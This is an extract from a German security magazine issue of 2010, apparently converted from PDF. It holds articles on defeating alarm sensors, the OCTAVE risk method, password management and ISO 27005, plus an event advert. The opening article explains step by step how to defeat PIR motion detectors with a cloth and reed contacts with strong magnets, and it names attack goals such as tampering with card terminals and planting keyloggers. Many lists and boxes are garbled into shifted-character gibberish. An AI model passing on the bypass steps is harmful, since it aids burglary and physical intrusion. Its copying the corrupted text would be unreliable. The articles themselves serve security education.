Nachricht mit der Zufallszahl überein, wird der Zu-
gang gewährt.
Bewegungsmelder
Bewegungsmelder verwenden für die Bewegungsde-
tektion Passiv Infrarot Sensoren (PIR). Jedes Objekt
emittiert eine Wärmestrahlung, ein PIR Sensor kann
diese Strahlung messen. Um Bewegungen detektieren
zu können, wird der Sensor mit Bündellinsen in Be-
reiche aufgeteilt. Ändert sich die einfallende Strahlung
in einem Bereich um einen bestimmten Schwellwert,
wird dies als Bewegung interpretiert. Der Schwellwert
sorgt außerdem dafür, dass statische Temperaturver-
änderungen der Umgebung nicht als Bewegung ge-
deutet werden. Diese Funktionsweise ist leider Fehler-
anfällig, so kann z.B. ein kalter Luftstrom bereits einen
Bewegungsmelder auslösen. Hierfür setzen bessere
Bewegungsmelder (Dualmelder) zusätzlich noch ei-
nen Ultraschall-Sensor ein. Nur wenn beide Sensoren
auslösen, wird eine Bewegung gemeldet. Damit sol-
len Fehlalarme verhindert werden. VdS-Anerkannte
Bewegungsmelder, die in Alarmanlagen verwendet
werden, lösen zusätzlich Alarm aus, wenn diese ab-
gedeckt werden.
Wie kann man Bewegungsmelder überlisten?
Je größer die Entfernung zu dem PIR Sensor ist, des-
to weniger nimmt eine Veränderung Einfluss auf die
einfallende Infrarotstrahlung in einem Bereich. Auch
haben Gegenstände mit gleicher Wärmestrahlung kei-
nen Einfluss auf die Sensoren. Einen Bewegungsmel-
der (auch einen Dualmelder) kann man deshalb mit ei-
nem Tuch überlisten. Zunächst lässt man das Tuch im
überwachten Raum einige Minuten liegen, damit es die
Temperatur der Umgebung annimmt. Wenn man sich
jetzt in dieses Tuch einhüllt und seitwärts mit dem Rü-
cken zum Bewegungsmelder langsam an diesem vor-
10/2010
 Penetration Testing im Jahre 2010
beigeht, wird keine Bewegung angezeigt. Zwar merkt
bei einem Dualmelder der Ultraschall-Sensor die Be-
wegung, da jedoch der Infrarot Sensor keine Bewe-
gung meldet, findet keine Alarmierung statt. Würde
man dieses Tuch etwa 30cm vor dem Bewegungsmel-
der aufspannen, würde man den Bewegungsmelder
außer Funktion setzen. Auch eine Abdeckerkennung
würde hier nicht auslösen, da diese in der Regel bis
20cm funktioniert.
Gibt es Alternativen?
Sicherlich gibt es sie. Zunächst einmal gibt es Bewe-
gungsmelder, die auf Basis von Radarstrahlung funk-
tionieren. Diese aktiven Bewegungsmelder können
verdeckt z.B. unter einer Tapete oder Abdeckplatte in-
stalliert werden. Dadurch ist ein solcher Bewegungs-
meder sowohl optisch nicht wahrnehmbar als auch
vor Sabotage und Vandalismus geschützt. Ein solcher
Bewegungsmelder arbeitet nach dem Dopplerprinzip
und strahlt im 9GHz oder 24GHz-Mikrowellenbereich.
Zwar halten sich die Hersteller solcher Geräte an die
gesetzlichen Bestimmungen, ich würde allerdings im-
mer auf eine zusätzliche Strahlenquelle verzichten, wo
es geht.
Eine weitere Alternative zu Bewegungsmeldern sind
Kameras. Zwar halte ich persönlich nichts von Über-
wachung und ständiger Videoaufzeichnung, doch
Kameras sind sehr gute Bewegungsmelder. Im Ge-
gensatz zu den klassischen PIR, Ultraschall oder Ra-
darbewegungsmeldern gibt es bei Kameras zahlrei-
che Bildpunkte, die ausgewertet werden können. Mit
entsprechender Software kann man detektierte Bewe-
gungen analysieren und z.B. mit einer Objekterken-
nung interpretieren. Verdächtige Bilder lassen sich an
ein Sicherheitsunternehmen in Echtzeit übertragen,
wo ein Mensch beurteilt, ob ein Alarm ausgelöst wer-
den muss oder nicht.
Reed-Relais
Reed-Relais werden heute verwendet, um z.B. Tür-
oder Fensteröffnungen zu detektieren. Ein Reed-Re-
lais besteht einem Reed-Kontakt und einem Magne-
ten. Der Reed-Kontakt wird am Rahmen befestigt und
ist an die Einbruchmeldezentrale angeschlossen. Der
Im Internet
t

http://de.wikipedia.org/wiki/Lockpicking – Wikipedia Ein-
trag zum Thema Lockpicking
t

http://www.evva.de
o
&JO
GàISFOEFS
)FSTUFMMFS
WPO
4DIMJF•
zylindern
t

http://de.wikipedia.org/wiki/Reed-Relais – Wikipedia Ein-
trag zum Reed-Relais
t

http://www.elv.de – Artikel-Nr. 68-835-10 – Radar Bewe-
gungsmelder
t

http://www.ettus.com/
o
)FSTUFMMFS
EFT
6431
4%3
4ZTUFNT
hakin9.org/de
Magnet wird auf dem beweglichen Element in Höhe
des Kontaktes befestigt. Wirkt ein Magnetfeld auf den
Reed-Kontakt, ziehen sich die Schaltkontakte gegen-
seitig an und ein Stromkreis wird geschlossen. Lässt
das Magnetfeld nach, wenn z.B. eine Tür geöffnet wird
und sich der Magnet dem Reed-Kontakt entfernt, wird
der Stromkreis geöffnet. In diesem Fall wird dann der
Alarm ausgelöst.
Wie lassen sich Reed-Relais überlisten?
Das ist vergleichbar einfach. Die Antwort auf diese Fra-
ge lautet natürlich: mit einem Magnetfeld. Hierfür eig-
nen sich sogenannte „Todesmagneten“ (Abbildung 9.).
Diese Permanentmagneten haben ein extrem starkes
Magnetfeld. Unter Laborbedingungen hat ein Reed-
Kontant bereits bei einer Entfernung von 40cm zum
Magneten seine Schaltkontakte geschlossen. Holz-,
Plastik- oder sogar Metall-Türen (sogar 2mm Stahl)
bieten keine ausreichende Dämpfung für das Magnet-
feld.
Eine bessere Alternative zu Reed-Relais sind Licht-
oder Laserschranken. Diese Schranken bringt man so
an, dass die Tür den Strahl beim öffnen unterbrechen
muss.
Ziele eines solchen Angriffes
Es sind viele Angriffsziele denkbar. Es kommt immer
auf das Unternehmen an, dass angegriffen wird. Vor
einigen Monaten berichtete die Presse über einen sol-
chen Angriff auf einen Baumarkt. Kriminelle Einbre-
cher haben hier statt waren zu stehlen, die Elektronik
der Karten-Terminals an den Kassen sabotiert, sodass
diese die eingelesenen Daten von EC- und Kreditkar-
ten samt der vom Kunden eingegebenen PIN per Funk
übermittelt wurden. Auf dem Parkplatz des Baumark-
tes stand dann der Angreifer und hat die Daten emp-
fangen.
Ein anderes Angriffsziel könnte der Anschluss eines
Mini-Computers am Netzwerk sein, der ein Loch durch
die Firewall bohrt und dem Angreifer einen permanen-
ten Zugriff auf das Netzwerk über das Internet gestat-
tet. Auch ist die Installation eines Hardware-Keylogers
denkbar, um die Zugangsdaten eines Mitarbeiters aus-
zuspionieren.
DIMITRI ROSCHKOWSKI
Der Autor arbeitet bereits seit vielen Jahren als selbstständi-
ger IT-Sicherheitsexperte und Consultant. Er führt außerdem
bei Unternehmen Penetration Tests durch.
Kontakt mit dem Autor: dimitri@roschkowski.biz
23
 12-11-2010

Die IT-Security Community Xchange ist DIE Weiterbildungsnacht für

SystemadministratorInnen, Lehrbeauftragte, StudentInnen, Schüler-
Innen, ExpertInnen und Geeks

hnell
Themen: Jetzt noch sc r:
te
anmelden un
stp.ac.at
„ Biometrie
:/ / it s e c x .f h
„ Penetration Testing http
„ Hackz und Crackz a h m e is t ko stenlos!
„ Privacy Die Teiln
„ Forensische Analyse
„ Intrusion Prevention, Malwarededection
„ Rootkits und deren Erkennung

Freitag, 12. November 2010, 17 – 24 Uhr

Fachhochschule St. Pölten
Matthias Corvinus-Straße 15, 3100 St. Pölten
T: +43/2742/313 228, E: office@fhstp.ac.at
I: www.fhstp.ac.at
 OCTAVE

OCTAVE –Hier macht

das Risiko die Musik
Helmut Kaufmann
Die überwiegende Mehrheit von Unternehmen sind nach regulativen
Vorgaben wie z.B. Basel II, Solvency II, SOX, 8. EU Auditrichtlinie
oder SAS 70 angehalten ein nachhaltiges und nachvollziehbares
Risikomanagement und Business Continuity Planning zu
implementieren.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...

t

&JOFO
ÃCFSCMJDL
àCFS
EJF
3JTJLPBOBMZTFNFUIPEF
0$5"7&
VOE
t

(SVOEMFHFOEFT
7FSTUÊOEOJT
WPO
3JTJLPBOBMZTFNFUIPEFO
/PS
EJF
.ÚHMJDILFJU
EJFTF
JO
EBT
3FHVMBUJW
*40
Y
[V
JOUFHSJF men und Standards.
ren.

m dies zielorientiert und auf die vorhandenen

U
Business Needs maßzuschneidern sind Risiko-
erkennung (Risikoanalyse) und deren anschlie-
ßende Bewertung (Business Impact Analyse) die ersten
Schritte, die gemacht werden müssen.
Eine effektive Informations-Sicherheitsbewertung be-
trachtet nicht nur den technologischen sondern auch
den dahinter liegenden organisatorischen Aspekt. Bei-
spielsweise die Handhabung der IT-Infrastruktur durch
die MitarbeiterInnen bei ihrer täglichen Arbeit. Durch ei-
ne Risikoanalyse erhält man einen organisationsweiten
Überblick über vorhandene Risiken und ist somit integ-
raler Bestandteil des Risikomanagements (vergl. Abb.
1).
OCTAVE ist eine risikobasierende, strategische Si-
cherheitsbewertungs und -planungstechnik.
OCTAVE® ist ein Kunstwort und setzt sich aus den
Begriffen: Operationally Critical Threat, Asset, and Vul-
nerability Evaluation zusammen. Sie wurde von der
Carnegie Mellon University, welche auch die populäre

Abbildung 1. Risikomanagementzyklus Abbildung 2. CIA

hakin9.org/de 25
 ABWEHR
Web-Site www.cert.org betreibt, passend für die unter-
schiedlichsten Unternehmensgrößen, als lizenzfreie
Risikoanalyse Methode entwickelt.
OCTAVE ist eine selbstgesteuerte Methode. Das be-
deutet, dass die MitarbeiterInnen einer Organisation
eine wesentliche Rolle bei der Erstellung der Sicher-
heitsstrategie übernehmen. Risiken von hoch kritisch
erkannten Assets, werden dazu verwendet um eine
entsprechende Priorisierung der Sicherheitsbereiche
durchzuführen.
Im Gegensatz zu typischen technologielastigen Be-
wertungsmethoden, die technologische Risiken und
taktische Sachverhalte in den Mittelpunkt der Betrach-
tung stellen, ist OCTAVE auf organisatorische Risiken
und deren dazu notwendigen Technologieeinsatz aus-
gerichtet. Sie ist eine äußerst flexible Methode, die für
fast alle Organisationen speziell angepasst werden
kann. Aus der Sichtweise des Autors ist einer der be-
merkenswertesten Vorteile jedoch, dass die Methode
von den MitarbeiterInnen selbst schnell erlernt und kon-
tinuierlich durchgeführt werden kann und somit nach-
haltig in den Risikomanagementprozess ohne weitere
Kosten integrierbar ist.
Ein ausgewähltes kleines Team aus allen operatio-
nellen Bereichen der Organisation inklusive der IT Ab-
teilung arbeiten zusammen um die Sicherheitsbedürf-
nisse der Organisation zu identifizieren und versuchen
die Gebiete: Operationelles Risiko, eingesetzte Sicher-
Abbildung 3. Octave Phasen
26
heitspraxis und Technologie ins Gleichgewicht zu setz-
ten. Getrieben von zwei Grundaspekten – operationel-
les Risiko und aktuell eingesetzte Sicherheitspraktiken,
wird die dahinter liegende Technologie in Zusammen-
hang mit der Sicherheitspraxis gegen die drei Eckpfeiler
der Sicherheit geprüft (vergl. Abb 2.)
OCTAVE ist ein wertegetriebener Bewertungsansatz.
Das Analysis Team
‡ ,GHQWL¿]LHUW LQIRUPDWLRQVEH]RJHQH $VVHWV GLH IU
die Organisation wichtig sind.
‡ )RNXVVLHUW GLH $NWLYLWlWHQ GHU 5LVLNRDQDO\VH DXI
diejenigen Werte, die als besonders kritisch beur-
teilt werden Berücksichtigt die Zusammenhänge
zwischen den kritischen Assets, den Bedrohungen
und den Verwundbarkeiten
‡ %HXUWHLOW 5LVLNHQ LQ HLQHP RSHUDWLRQHOOHQ =XVDP
menhang
‡ (QWZLFNHOW HLQH SUD[LVRULHQWLHUWH 6FKXW]VWUDWHJLH
(organisatorisch und auch einen Plan zur Reduzie-
rung der Risiken auf kritische Infrastrukturen)
Daraus resultiert ein dreiphasiges Vorgehensmo-
dell für die Erhebung des gesamtorganisatorischen
Schutzbedürfnisses. (vergl. Abb. 3)
‡ 3KDVH Aufbau von Asset-basierenden Bedro-
KXQJVSUR¿OHQ– Das Analyse Team stellt informati-
10/2010
 OCTAVE
onsbezogene Assets und deren Impact auf die Or-
ganisation sowie deren derzeitige Schutzmechanis-
men fest. Darauf aufbauend werden die kritischsten
$VVHWV GH¿QLHUW XQG GLH 6LFKHUKHLWVDQIRUGHUXQJHQ
dafür bestimmt. Anschließend wird für jedes kri-
WLVFKH $VVHW GLH %HGURKXQJHQ LGHQWL¿]LHUW XQG HLQ
HQWVSUHFKHQGHV%HGURKXQJVSUR¿OHUVWHOOW
‡ 3KDVH Erkennen von Verwundbarkeiten der Infra-
struktur – Hier wird die, hinter den kritischen Assets
liegende, Infrastruktur bewertet. Dabei werden kriti-
sche Infrastrukturpfade und informationstechnolo-
gische Komponentenklassen aufgestellt und einer
technischen Überprüfung – dem Penetration Test –
]XJHIKUW 'DV (UJHEQLV ÀLH‰W GDQQ LQ GLH %HZHU
tung direkt ein.
‡ 3KDVH (QWZLFNHOQ HLQHU 6LFKHUKHLWVVWUDWHJLH XQG
HLQHV 6LFKHUKHLWVSODQHV – In dieser Phase ent-
scheidet das Analyse-Team wie mit den kritischen
Assets umgegangen werden soll. Basierend auf die
ELV GDKLQ HUDUEHLWHWHQ 'DWHQ XQG )DNWHQ ZLUG HLQH
organisationsweite Schutzstrategie und ein Plan für
die Reduzierung der erkannten Risiken, die auf die
kritischen Assets und deren Infrastrukturen einwir-
ken können erstellt.
Die einzelnen Prozesse, die den drei Phasen hinter-
legt sind, stellen sicher, dass von allen Organisati-
Abbildung 4. Octave und Risikomanagement
hakin9.org/de
onseinheiten und von allen hierarchischen Ebenen
– also von den MitarbeiterInnen über operationa-
les und strategisches Management bis hin zum Ma-
nagement der ersten Ebene, alle Sichtweisen und
die damit verbundenen Bewertungen der kritisch-
VWHQ $VVHWV LQ GLH *HVDPWEHXUWHLOXQJ PLW HLQÀLH‰HQ
können.
OCTAVE generiert so eine organisationsweite Sicht
auf die aktuellen Informationssicherheitsrisiken.
)ROJHQGH6FKULWWHVLQGQDFKGHU5LVLNRDQDO\VH]XVHW
zen:
‡ (UVWHOOXQJ HLQHV GHWDLOOLHUWHQ +DQGOXQJV3ODQHV
wie die erstellte Schutzstrategie und der Plan zur
Risikoreduzierung umgesetzt werden kann.
‡ =HLWOLQLHQJHVWHXHUWH 8PVHW]XQJ GHV HQWZRUIHQHQ
Handlungs-Planes.
Überwachen/Beobachten des Handlungsplanes nach
Effektivität. Das beinhaltet z.B. das Beobachten der
Risiken für jede Änderung.
‡ .RQWUROOH GHV $EODXISODQHV GXUFK JHHLJQHWH 0HWUL
ken.
Die OCTAVE Methode ersetzt kein Risikomanagement
sondern gehört in ein strukturiertes Risikomanage-
27
 ABWEHR
Abbildung 5. Mapping auf ISO 27001
ment eingebettet, welches nach einem SODQGRFKHFN
act Zyklus arbeitet. (vergl. Abb 4)
Die Organisation sollte in periodischen Abständen
ihre ermittelte Baseline zurücksetzen indem eine
nochmalige Risikoanalyse durchgeführt wird. Diese
Zeitspanne kann vorgegeben werden oder von wich-
tigen Ereignissen wie z.B. eine Restrukturierungs-
maßnahme der z.B. Netzwerkinfrastruktur u.v.m. an-
gestoßen werden. Zwischen den Analysen kann die
Organisation periodisch neue Risiken identifizieren,
analysieren und in Relation zu bereits existieren-
den Risiken, Risiko reduzierende Maßnahmen entwi-
ckeln.
Da die Risikoanalyse nur einen Teil des Risikoma-
nagements darstellt ist die OCTAVE Methode mit ih-
rer offenen Schnittstelle hervorragend geeignet um als
„Best Practice“-Grundlage die ISO 27001 Norm zu im-
Mehr Informationen:
t

0$5"7&
www.cert.org/octave/
t

$0#*5
www.isaca.org
t

*40
Y
www.standards-online.net/InformationSecurity-
Standard.htm
28
plementieren und in der Umsetzungsphase den COBIT
4.0 Standard zu verwenden.
OCTAVE bildet die Grundlage der in der ISO 27001
JHIRUGHUWHQ 5LVLNR$QDO\VH GXUFK )HVWOHJXQJ GHV %H
trachtungsbereiches, feststellen von kritischen Orga-
nisationswerten, qualitative und eventuell quantitative
Betrachtung von Risiken, Entwicklung von entspre-
chenden Kontrollmaßnahmen um Risiken zu minimie-
ren oder aber auch zu akzeptieren. Anschließend kann
man unter Zuhilfenahme von COBIT die, der ISO Norm
zugeschriebenen, Kontrollen implementieren. Man
kann somit die IT Sicherheitsstrategie der betrachteten
Organisation mit einer Risikoanalyse nach dem OCTA-
VE Ansatz, und dem standardisierten Reifegrad-Modell
nach COBIT - geprüft nach ISO 27001 - auswerten und
umsetzen. (Verg. Abb. 5)
MAG. HELMUT KAUFMANN, MSC
Dozent an der Fachhochschule St. Pölten und u.a. tätig im Be-
reich Secure Data Center Management, Cloud Computing, Di-
saster Recovery and Business Continuity, Fraud Detection.
10/2010
 News

Wetten, dass ... Ihr größtes

Betriebsgeheimnis ungeschützt ist?
Wie ein schlechter Sickerwitz, stellt man sich zuerst die Frage,
was ist unser größtes Betriebsgeheimnis: Die Kundenlisten,
die Projektdokumentationen und Strategiepapiere, die Zahlen
auf den Bankkonten oder gar die private Telefonnummer vom
Vorstandsvorsitzenden? Schlussendlich sind es die Passwörter
und Zugangsberechtigungen auf sämtliche Anwendungen und
Datenbanken in jedem Unternehmen oder Organisation.
Tausende Passwörter von Usern und
Administratoren sind im Umlauf
Man stelle sich komplexe IT Landschaften vor, die geo-
grafisch verteilt sind und viele Mitarbeiter, die in verschie-
dene „Rollen“ schlüpfen. Eine Buchhalterin hat nicht nur
Zugang zu standardisierten Anwendungen, sondern auch
zum Internetbanking, der FIBU Software und anderen
kaufmännischen Programmen wie SAP. Interessant und
zunehmend komplex wird es bei den IT Administratoren.
Natürlich können sich diese, von vielen für ihre mathema-
tischen Fähigkeiten bewunderten, auch nicht dutzende
von Passwörtern merken, sondern helfen etwas nach: Pro
Anwendung wird ein Passwort vergeben, das sich diese
dann für längere Zeit im Gedächtnis behalten. Mit dieser
Feststellung wird die gesamte Problematik sofort offenbar,
ohne in technische Details gehen zu müssen: ein Pass-
wort ... für längere Zeit ... im Gedächtnis.
Guter Rat ist teuer - und umsonst
Richtlinien zur Passwortgestaltung gibt es unzählige und
viele sind gut gemeint: Die Länge wird vorgegeben und
auch die zu verwendenden Zeichen, die alle 4 Wochen
zu ändern sind und natürlich nicht auf einem Post-It unter
der Tastatur kleben sollen. Selbst wenn dies eingehal-
ten wird, vergisst man sein neues Passwort spätestens,
wenn man 2 Wochen auf Urlaub war und auch der Help-
Desk freut sich, dass man wieder zurück ist. Auch der
Auditor ist zumindest milde gestimmt, wenn die zentralen
Passwörter zumindest in einer gesicherten Excel Liste
zusammengefasst sind. Von IT Security sollte man aber
dabei besser nicht sprechen, da jeder Administrator auf
alle Passwörter zugreifen kann. Spätestens bei automa-
tisierten (unattended) Passwörtern, die via Skript fixiert
sind und auf eine Anwendung oder Datenbank zugreifen,
sind verhaltensorientierte Ansätze obsolete.
rung eines automatisierten Passwort-Managements
wird oft erst festgestellt, dass zehntausende privilegier-
te Administratorkonten vorhanden sind, aber nur 20%
davon als Administratorkonten dienen. Der überwiegen-
de Teil der Passwörter sind Application-to-Application
(A2A) und Application-to-Database (A2D) Konten, die
in Skripts den Zugriff ermöglichen. Und natürlich nur in
seltensten Fällen geändert werden und somit immer ei-
ne Hintertüre, auch für den Ex-Mitarbeiter, offenlassen.
Die Passwort Autorität: Freiwilligkeit und
Empfehlungen sind nicht angebracht
Die Zugangsberechtigungen sind als Schlüssel für Safes
mit allen Geheimnissen der Organisation anzusehen.. Das
Ergebnis einer Reflektion der Problematik „Passwörter“
kann nur sein, dass ein automatisiertes und auditierbares
Software-Werkzeug in Frage kommen kann. Die Durchset-
zung der Passwörter Policies, Zuteilung von Einmal-Pass-
wörtern und vor allem eine sichere Authentifizierung und
Ablage dieser ist natürlich ebenso ein Must-Have. In Zeiten
wie diesen, sollte es auf Knopfdruck möglich sein, einen Ad-
ministrator zu sperren oder zeitlich begrenzte Passwörter
für externe Dienstleister ausstellen zu können.
Antares NetlogiX empfiehlt nach eingehender Analy-
se - des sehr überschaubaren Marktes - die Lösung
„Cloakware Password Authority“. Die ersten erfolgrei-
chen Referenzprojekte und Kundenmeinungen haben
diese Meinung weiter verstärkt.

Passwortstruktur ist unbekannt

Kaum ein IT Verantwortlicher hat verlässliche Informa-
tionen über die Strukturen und Verbreitungsgrade von
Passwörtern in einer Organisation. Bei Implementie-

hakin9.org/de 29
 ABWEHR

IT-Risikomanagement
– Wozu brauche ich das?
Andreas Lentwojt
In der letzten Ausgabe habe ich Ihnen ausführlich die Norm
ISO/IEC 27001 vorgestellt und einen kurzen Einblick in die
27000-Familie gegeben. Ein Teil dieser Familie ist die ISO 27005, die
sich mit dem IT-Risikomanagement befasst.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...

t

JO
XFMDIFN
,POUFYU
TJDI
EJF
*40*&$

CFXFHU t

,FOOUOJTTF
àCFS
*54JDIFSIFJU
JO
NJUUMFSFOHSڕFSFO
6OUFSOFI
t

EFO
"VGCBV
EFS
/PSN men
t

NFIS
àCFS
EFO
"CMBVG
EFT
3JTJLPNBOBHFNFOU1SP[FTTFT t

,FOOUOJTTF
àCFS
EJF
&JHFOTDIBGUFO
FJOFT
*4.4
[#
OBDI
*40
IEC 27001)

n der heutigen Ausgabe werde ich Ihnen darstellen,

I
warum es nützlich ist, sich mit dem Risikomanage-
ment der IT zu beschäftigen und dabei auf das Mo-
dell der ISO 27005 zurück zu greifen.
Auf dieses Thema wurde bereits in einer früheren
Ausgabe eingegangen, in diesem Artikel wird aber
mehr auf die Norm und den eigentlichen Prozess mit
den einzelnen Schritten eingegangen.
Größere Unternehmen sind schon von Gesetz her
verpflichtet, sich mit dem Themenbereich Risiko-
management zu beschäftigen (Aktiengesetz, Kon-
TraG, GmbH-Gesetz u.Ä.). Ein Teil dieses Risikoma-
nagements ist das IT-Risikomanagement, welches
sich – wie der Name es schon sagt – mit den Risi-
ken im IT-Bereich beschäftigt. Eine Problematik beim
Risikomanagement, allgemein und speziell bei der

Abbildung 1. Aufbau eines Risikomanagementsystems (allgemein)

30 10/2010
 IT-Risikomanagement – Wozu brauche ich das?
Informationstechnologie, ist die Bewertung der er-
kannten Risiken. Bereits seit einigen Jahren gab es
nationale Normen, die sich mit einem standardisier-
ten Vorgehensmodell beschäftigten. Im Juni 2008
wurde daraus die international anerkannte Norm
ISO/IEC 27005:2008 (ehem. BS 7799-3:2006). ISO
27005:2008 ist eine spezielle Ausprägung der ISO/IEC
31000:2009, die sich mit dem Risikomanagement all-
gemein befasst. Die genauen Bezeichnungen lauten:
‡ ,62,(&  Ä5LVN 0DQDJHPHQW ± SULQFLS
les and guidelines“
‡ ,62,(&Ä,QIRUPDWLRQVHFXULW\ULVNPD
nagement“
Warum überhaupt ein IT-Risikomanagementsystem im
Unternehmens-Kontext?
Datenverlust und -diebstahl gehören zu den größten
Problemen in Unternehmen. Bisher bezog sich Risiko-
management in Unternehmen hauptsächlich auf Markt-
und Adressrisiken sowie auf finanzielle Risikofaktoren.
Das Risikomanagement im IT-Bereich wurde weitgehend
vernachlässigt. Dabei lassen sich Sicherheitslücken mit-
tels Risikomanagement aufdecken und minimieren, was
auch Regressforderungen an die Unternehmensführung
Abbildung 2. Aufbau der ISO 27005:2008
hakin9.org/de
entgegenwirkt. Richtlinien wie Basel II oder Euro-SOX
fordern diese Ausrichtung seit langem.
Die ISO 27005 ist branchen- und größenunabhängig.
Somit können auch kleinere und mittlere Unternehmen
durch die Adaption der Inhalte auf die betrieblichen An-
forderungen ein schlankes und effektives IT-Risikoma-
nagement aufbauen. Gerade sensible Branchen wie
Automotive, Healthcare, Software oder Telekommuni-
kation werden hier angesprochen. Aufgrund ähnlicher
Strukturen lässt sich die ISO 27005 ohne größeren Auf-
wand in ein unternehmensweites Risikomanagement
integrieren, kann aber auch »solo« umgesetzt werden.
Im Gegensatz zur ISO/IEC 27001 ist die ISO/IEC 27005
selbst nicht zertifizierbar.
Kapitel 1
– Risikomanagementsystem allgemein
Wie bei der ISO 27001 geht es auch bei der ISO 27005
nicht um das „was“, sondern um das „wie“. Es ist ein
Leitfaden zur Implementierung eines Risikoprozesses
im Kontext der Informations- und Telekommunikations-
technologie. Wie sieht so ein Risikoprozess nun aus?
Ganz allgemein betrachtet geht es wiederum um ein
Managementsystem, welches aus 6 Schritten (vergl.
Abb. 1) besteht:
31
 ABWEHR

‡ )HVWOHJXQJGHU5LVLNRIHOGHU ‡ GHU$QDO\VHGHU5LVLNRDXVZLUNXQJHQVRZLHGHU$E

‡ 5LVLNRHUNHQQXQJXQG±DQDO\VH schätzung der Risikowahrscheinlichkeit und des Ri-
‡ .RPPXQLNDWLRQ sikoniveaus
‡ 9HUDQWZRUWOLFKNHLWHQXQG$XIJDEHQ ‡ 2SWLRQHQ]XU5LVLNREHKDQGOXQJ
‡ hEHUZDFKXQJVXQG.RQWUROOV\VWHP ‡ ,GHQWL¿NDWLRQXQG(YDOXDWLRQYRQSDVVHQGHQ5LVLNR
‡ 'RNXPHQWDWLRQGHUJHWURIIHQHQ0D‰QDKPHQ managementmaßnahmen

Kapitel 2 – Der Standard ISO/IEC 27005:2008
Die ISO 27005 stellt eine Anleitung zur IT Risikoanaly-
se und zum Risikomanagement im IT Bereich dar. Sie
beinhaltet dabei einerseits eine Beschreibung des kom-
pletten Risikomanagementprozesses als Ganzes und
andererseits eine genaue Beschreibung der einzelnen
Schritte des Risikomanagementprozesses und der Ri-
sikoanalyse. Die Anhänge der IEC 27005 liefern zudem
nützliche Informationen zur Implementierung eines Ri-
sikomanagementsystems im Bereich Informationssi-
FKHUKHLWXQGGDPLW]XU(UIOOXQJYRQ)RUGHUXQJHQGHU
Norm ISO 27001:
‡ HLQHUNODUHQ9RUJHKHQVZHLVH]XU(LQVFKlW]XQJYRQ
5LVLNHQLQNOGHU)HVWOHJXQJYRQ$N]HSWDQ]NULWHULHQ
‡ GHU ,GHQWL¿NDWLRQ YRQ 5LVLNHQ LQVEHVRQGHUH EH]R
gen auf bedrohte Werte, direkte und indirekte Be-
drohungen und Schwachstellen
Abbildung 3. Der Sicherheitsprozess gem. ISO 27005:2008
32
'HU$XIEDXZLUGLQGHU*UD¿NGHXWOLFKYHUJO$EE
Aus diesen einzelnen Kapiteln der Norm wird der IT-
Sicherheitsprozess entwickelt (vergl. Abb. 3).
Kapitel 3 – Die Phasen
Definition der Rahmenbedingungen
In einem ersten Schritt wird in einer Schutzbedarfsfest-
stellung (High Level Risk Analysis) der Schutzbedarf für
GLH HLQ]HOQHQ ,76\VWHPH HUPLWWHOW )U ,76\VWHPH GHU
Schutzbedarfskategorie "niedrig bis hoch" wird i.d.R. auf
eine detaillierte Risikoanalyse verzichtet. Dies erlaubt ei-
ne schnelle und effektive Auswahl von grundlegenden
Sicherheitsmaßnahmen bei gleichzeitiger Gewährleis-
tung eines angemessenen Schutzniveaus. IT-Systeme
der Schutzbedarfskategorie „sehr hoch" sind einer de-
taillierten Risikoanalyse zu unterziehen, auf deren Basis
individuelle Sicherheitsmaßnahmen ausgewählt werden.
10/2010
 IT-Risikomanagement – Wozu brauche ich das?

Diese Option kombiniert die Vorteile des Grund-
schutz- und des Risikoanalyseansatzes, da alle IT-
Systeme mit hohem Schutzbedarf wirksam und ange-
messen geschützt werden. Maßnahmen können für die
anderen Systeme mit Hilfe des Grundschutzes schnell
und effektiv ausgewählt werden. Diese Methode stellt in
den meisten Einsatzumgebungen eine empfehlenswer-
te Strategie zur Risikoanalyse dar.
werte entsprechen, da sich die Werte in Kombination er-
gänzen und einen höheren Wert darstellen.
Die zu schützenden Werte sind vielfältigen Be-
drohungen ausgesetzt. Im Rahmen der Risikoana-
lyse ist nun die Eintrittswahrscheinlichkeit abzu-
schätzen.
Bedrohungen sind charakterisiert durch:
Zu den einzelnen Kriterien, die festgelegt werden
müssen gehören u.a.
‡ (LQÀXVVJU|‰HQIUGLH%HZHUWXQJ
‡ .ULWHULHQIUGLH5LVLNRDN]HSWDQ]
‡ 8PIDQJXQG*UHQ]HQGHV50
‡ 2UJDQLVDWLRQXQG9HUDQWZRUWOLFKNHLWHQ
Risikobewertung
Die Risikobewertung gliedert sich in die beiden Vor-
gänge Risikoanalyse und der Priorisierung der Risiken.
Die Risikoanalyse ist sicherlich der schwierigste und
aufwendigste Teil, müssen doch zunächst die Risiken
LGHQWLIL]LHUWXQGGDQDFKEHZHUWHWZHUGHQ)UDOOHÄ$V-
sets“ des Unternehmens wird folgender Prozess durch-
laufen:
‡ $VVHWLGHQWL¿]LHUHQ
‡ :HUWEHVWLPPHQ
‡ HYHQWXHOOH%HGURKXQJHQ]XZHLVHQ
‡ ,VW0D‰QDKPHQHUKHEHQ
‡ 6FKZDFKVWHOOHQHUKHEHQ
Dieser Prozess wird für alle Assets wiederholt. Ein As-
set im Sinne der ISO 27005 ist alles, was einen Wert
für die Organisation besitzt und daher schützenswert
LVW(VLVWDOVRGXUFKDXVVLQQYROOEHLGHU'H¿QLWLRQGHU
Rahmenbedingungen den zu betrachtenden Rahmen
zunächst eng zu fassen. Er kann später immer noch
erweitert werden. Die Norm unterteilt hierbei in primä-
re Assets (Geschäftsprozesse und –aktivitäten, Infor-
mationen) und unterstützende Assets (Hard- und Soft-
ware, Netzwerk, Personal, Infrastruktur, etc.). Eine de-
WDLOOLHUWH $XIVWHOOXQJ EH¿QGHW VLFK LP $QKDQJ % GHU
Norm.
Aus dem beschriebenen Prozess erfolgt eine Analyse
und Auflistung der Konsequenzen und letztendlich eine
Risikoeinschätzung.
)UGLH:HUWHDQDO\VHN|QQHQXQWHUVFKLHGOLFKH0HWKR-
GHQ DQJHZHQGHW ZHUGHQ )U 6DFKZHUWH ]% HLQH %H-
wertung nach Zeitwert, nach Wiederbeschaffungswert,
nach dem Wert für einen potenziellen Angreifer oder
nach dem Schaden für die Organisation aus einem Ver-
lust des Assets. Immaterielle Werte werden i.d.R. nach
dem Wert für einen potenziellen Angreifer oder nach dem
Schaden für die Organisation aus einem Verlust des As-
sets bewertet. Bei der Bewertung ist zu beachten, dass
Wertekombinationen häufig nicht der Summe der Einzel-
hakin9.org/de
